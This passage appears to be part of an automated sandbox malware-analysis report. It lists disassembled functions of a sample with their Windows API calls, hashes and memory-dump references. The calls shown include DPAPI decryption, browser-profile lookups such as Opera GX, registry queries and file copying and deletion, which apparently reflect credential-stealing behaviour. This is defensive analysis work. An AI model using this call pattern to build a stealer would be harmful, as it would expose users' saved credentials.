                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4191843772-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: f7fddd48446b66624f989ddf55f757fe03e7b97f552272bf7b28bd8c8e1d3731
                                                                                                                                                                                                                                                                                                  • Instruction ID: 30e341699e2e63c723fbf29d5a2f39e223cda5f639fb32d69e3c15c830b377e5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7fddd48446b66624f989ddf55f757fe03e7b97f552272bf7b28bd8c8e1d3731
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5721FB317016146BDB355E65DD8CBAE7279AF46708F50092AF90397741E7206840C7F1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00410F70 Relevance: 7.6, APIs: 5, Instructions: 70commemoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(00427AB4,00000000,00000001,00427260,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?), ref: 00410F8D
                                                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00410F9C
                                                                                                                                                                                                                                                                                                  • _wtoi64.MSVCRT ref: 00410FE2
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00410FF8
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00410FFB
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Free$AllocCreateInstance_wtoi64
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1817501562-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 99efa5cf341d0c5a4f536511f82e5ceebee3ff228c9a1ec95ae9d6f44b693dba
                                                                                                                                                                                                                                                                                                  • Instruction ID: f339f683a09679795ac17ff9659d8e63658d8b914be92c526fb569d364882cc1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99efa5cf341d0c5a4f536511f82e5ceebee3ff228c9a1ec95ae9d6f44b693dba
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB118175700118AFC720DFA9CC85EAABBB9EFC9704B1081AAF905C7310D675EE42CB60
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00406AE0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: 0l@$0l@$0l@
                                                                                                                                                                                                                                                                                                  • API String ID: 0-278002525
                                                                                                                                                                                                                                                                                                  • Opcode ID: d9fc23f20392344533ef2d983e31f0e7033ca9f6a2f3c0fdbc76c7e886b2572f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1a87c9e28315db84159d1825db7685bd73dc57595dfdda9b1935a5cd357ea1c2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9fc23f20392344533ef2d983e31f0e7033ca9f6a2f3c0fdbc76c7e886b2572f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 394192B1E002159BEB14DF5AD941AAFB7B8EF84314F01847AEC09A7391E738DD508BA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040A170 Relevance: 6.3, APIs: 4, Instructions: 282filestringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,0156F048,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00426AAA,00000009), ref: 0040A227
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040A40B
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040A41F
                                                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040A4A1
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 211194620-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 667ad3b203bf6fc85cf3e4c277fb277ffb9b7896b2c50844c84a4a1de004fd4d
                                                                                                                                                                                                                                                                                                  • Instruction ID: b59fb0c15770b26fa6eb1e59df2b1821273456b1948b1926dc15d3532991443d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 667ad3b203bf6fc85cf3e4c277fb277ffb9b7896b2c50844c84a4a1de004fd4d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4B18070801248EACB14EBE4D955BEDBB79AF29304F54417EE502732D2DB782B0DCBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040CDE0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004116D0: LocalAlloc.KERNEL32(00000040,?,?,00000001,00000004,?,00413C40,00000000,00000000), ref: 004116EC
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,01571F98,?,?,?,?,?,?,?,?,?,?,?,00421750,?), ref: 0040CE4B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406F50: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004064DB,00000000,00000000), ref: 00406F77
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406F50: LocalAlloc.KERNEL32(00000040,00000000,?,004064DB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F86
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406F50: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004064DB,00000000,00000000), ref: 00406F9D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406F50: LocalFree.KERNEL32(?,?,004064DB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406FAC
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040CE89
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406FD0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406FF5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406FD0: LocalAlloc.KERNEL32(00000040,?,?), ref: 0040700D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406FD0: LocalFree.KERNEL32(?), ref: 0040702E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                                                                                                                                  • String ID: $DPAPI
                                                                                                                                                                                                                                                                                                  • API String ID: 512175977-1819349886
                                                                                                                                                                                                                                                                                                  • Opcode ID: e57edee3f3d7b817aeb0e109a879f4908534b96d8f8cc706ab0346b101acb06e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 756776268f3a410f8ea97ed2d03368a249db7ca66dc35e5b071a325b4266dc37
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e57edee3f3d7b817aeb0e109a879f4908534b96d8f8cc706ab0346b101acb06e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D431B4B1D00109ABDB10DB95DC42BEFB77AEB44314F14462AF905B32D1E738A90587E6
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 004104D0 Relevance: 6.0, APIs: 4, Instructions: 39memoryregistryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004104E5
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 004104EC
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,0156B410,00000000,00020119,00000000), ref: 0041050B
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(00000000,01571D80,00000000,00000000,00000000,000000FF), ref: 00410526
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3676486918-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5e6d39d117e0467e1ea244c9ca8b316610d55b9159fd229541649f6d9304fad4
                                                                                                                                                                                                                                                                                                  • Instruction ID: 676a6382b8ff66aaa777a0d0020f05f931ed1f937911e77e191903498250bf3d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e6d39d117e0467e1ea244c9ca8b316610d55b9159fd229541649f6d9304fad4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92F04FB9640218FFE710DBA0EC49FAB7B7EEB49B01F005159FB0597240D6705900CBA0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040E2F0 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 485COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera GX,00426AD3,00426AD2,?,?), ref: 0040E34D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411610: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421AB8,000000FF,?,0040E72A,?,00000000,00000000,00000000,?,?), ref: 00411637
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040CDE0: StrStrA.SHLWAPI(00000000,01571F98,?,?,?,?,?,?,?,?,?,?,?,00421750,?), ref: 0040CE4B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040CDE0: memcmp.MSVCRT ref: 0040CE89
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                                                                                                                                                                                                                                                                  • String ID: $$Opera GX
                                                                                                                                                                                                                                                                                                  • API String ID: 1439182418-3699434461
                                                                                                                                                                                                                                                                                                  • Opcode ID: fd309a3b40900918eb7f523b4228bde185d93eea0c4cc0c3a7b4a9c3baf3580c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 80cc4b7ed22ef5f98a5cc857f1ea2cbded4609870464dcecd3af56b3405bc9c8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd309a3b40900918eb7f523b4228bde185d93eea0c4cc0c3a7b4a9c3baf3580c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68128070901248EACB14EBE5D945ADDBBB9AF19304F14817EE905732D2DB782B0CC7A6
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040ECC9 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F748), ref: 0040ECE0
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F708), ref: 0040EDE3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040E2F0: StrCmpCA.SHLWAPI(00000000,Opera GX,00426AD3,00426AD2,?,?), ref: 0040E34D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: Stable\
                                                                                                                                                                                                                                                                                                  • API String ID: 3722407311-272486606
                                                                                                                                                                                                                                                                                                  • Opcode ID: da73e72bf46c9c8938a123d0de55fbd3436eada3c5d5d954846008cbdd8a4f45
                                                                                                                                                                                                                                                                                                  • Instruction ID: 269e7effacccc3b88f2b0db5f774b9eadeb94123610fb6cb7fcf78a80ad87f18
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da73e72bf46c9c8938a123d0de55fbd3436eada3c5d5d954846008cbdd8a4f45
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CB13774900248DFCB24DFA9C581ADEBBF5BF48304F10856EE946A3791D774AA08CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00413E10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00413E40
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F0F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                                                                                                                  • String ID: ERROR
                                                                                                                                                                                                                                                                                                  • API String ID: 1659193697-2861137601
                                                                                                                                                                                                                                                                                                  • Opcode ID: 875d17d054caf0032805d24f7412f369e5d2c0d1644f1f1309d22229dc259743
                                                                                                                                                                                                                                                                                                  • Instruction ID: d06a122d75f069d58e7f74fa6f005182342bd9d38848a2deb67c20992f7cfd55
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 875d17d054caf0032805d24f7412f369e5d2c0d1644f1f1309d22229dc259743
